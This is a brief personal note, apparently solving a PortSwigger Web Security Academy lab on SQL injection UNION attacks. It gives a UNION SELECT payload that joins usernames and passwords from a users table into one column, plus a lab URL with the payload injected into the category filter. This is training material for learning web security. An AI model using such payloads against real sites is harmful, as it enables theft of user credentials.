https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column

like previous example:

Accessories' UNION SELECT NULL, username || '~' || password FROM users--

https://ac691f571ed877e6c0c80e7500f70051.web-security-academy.net/filter?category=Pets'+UNION+SELECT+NULL,+username || '~' || password+FROM+users--

Untitled